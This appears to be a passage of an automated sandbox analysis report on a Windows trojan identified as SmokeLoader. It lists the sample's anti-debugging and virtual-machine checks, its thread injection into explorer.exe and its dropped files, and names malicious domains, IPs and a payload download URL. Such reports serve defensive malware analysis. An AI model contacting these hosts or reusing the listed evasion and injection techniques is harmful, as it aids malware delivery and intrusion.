Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\wehrbbi	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\wehrbbi	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\F421.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\F421.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\rghrbbi	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\rghrbbi	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: F421.exe, 00000006.00000002.2354567904.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: wehrbbi, 00000005.00000002.2011356762.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKNC5

Source: C:\Users\user\AppData\Local\Temp\F421.exe

Code function: 6_2_00401E65 rdtsc

6_2_00401E65

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 451	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1080	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 761	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2115	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 870	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 882	Jump to behavior

Source: C:\Windows\explorer.exe TID: 3244	Thread sleep count: 451 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1136	Thread sleep count: 1080 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1136	Thread sleep time: -108000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2304	Thread sleep count: 761 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2304	Thread sleep time: -76100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 792	Thread sleep count: 327 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3052	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 764	Thread sleep count: 278 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2076	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804	Thread sleep count: 108 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1136	Thread sleep count: 2115 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1136	Thread sleep time: -211500s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1735407211.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1734283056.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1731082031.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1735407211.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1735407211.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1734283056.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1735407211.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1731082031.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1734283056.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\F421.exe

Code function: 6_2_00401E65 rdtsc

6_2_00401E65

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02C30D90 mov eax, dword ptr fs:[00000030h]	0_2_02C30D90
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02C3092B mov eax, dword ptr fs:[00000030h]	0_2_02C3092B
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_02DFA184 push dword ptr fs:[00000030h]	0_2_02DFA184
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02C70D90 mov eax, dword ptr fs:[00000030h]	5_2_02C70D90
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02C7092B mov eax, dword ptr fs:[00000030h]	5_2_02C7092B
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_02D29F6C push dword ptr fs:[00000030h]	5_2_02D29F6C
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB0D90 mov eax, dword ptr fs:[00000030h]	6_2_02CB0D90
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02CB092B mov eax, dword ptr fs:[00000030h]	6_2_02CB092B
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Code function: 6_2_02DAA070 push dword ptr fs:[00000030h]	6_2_02DAA070
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_02BA0D90 mov eax, dword ptr fs:[00000030h]	8_2_02BA0D90
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_02BA092B mov eax, dword ptr fs:[00000030h]	8_2_02BA092B
Source: C:\Users\user\AppData\Roaming\rghrbbi	Code function: 8_2_02D2A070 push dword ptr fs:[00000030h]	8_2_02D2A070

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: rghrbbi.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 186.233.231.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 116.58.10.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Thread created: C:\Windows\explorer.exe EIP: 31119A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Thread created: unknown EIP: 87E19A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Thread created: unknown EIP: 8741970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Thread created: unknown EIP: 8771970	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wehrbbi	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F421.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rghrbbi	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1734283056.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1730684274.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1729495582.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

Code function: 0_2_00415B00 InterlockedCompareExchange,ReadConsoleW,FindAtomW,GetConsoleMode,SearchPathA,GetDefaultCommConfigA,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,GetSystemTimeAdjustment,PulseEvent,SetCommState,GetConsoleAliasesLengthW,GetStringTypeExW,GetComputerNameW,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,GetFileAttributesA,

0_2_00415B00

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

0_2_00415B00

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	521 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wBgwzVbZuV.exe	42%	ReversingLabs	Win32.Trojan.CrypterX
wBgwzVbZuV.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\F421.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wehrbbi	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\rghrbbi	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wehrbbi	42%	ReversingLabs	Win32.Trojan.CrypterX

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://23.145.40.164/ksa9104.exe	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://ninjahallnews.com/search.php	0%	Virustotal		Browse
https://aka.ms/odirmr	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://fallhandbat.com/search.php	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Virustotal		Browse
https://aka.ms/Vh5j3k	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	Virustotal		Browse
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	Virustotal		Browse
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Virustotal		Browse
https://www.msn.com:443/en-us/feed	0%	Virustotal		Browse
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	116.58.10.60	true	true	12%, Virustotal, Browse	unknown
fallhandbat.com	unknown	unknown	true		unknown
ninjahallnews.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://23.145.40.164/ksa9104.exe	true	0%, Virustotal, Browse	unknown
https://ninjahallnews.com/search.php	true	0%, Virustotal, Browse	unknown
https://fallhandbat.com/search.php	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1733819519.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1733347044.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1735918498.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1740089968.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1740089968.000000000C99C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1740089968.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
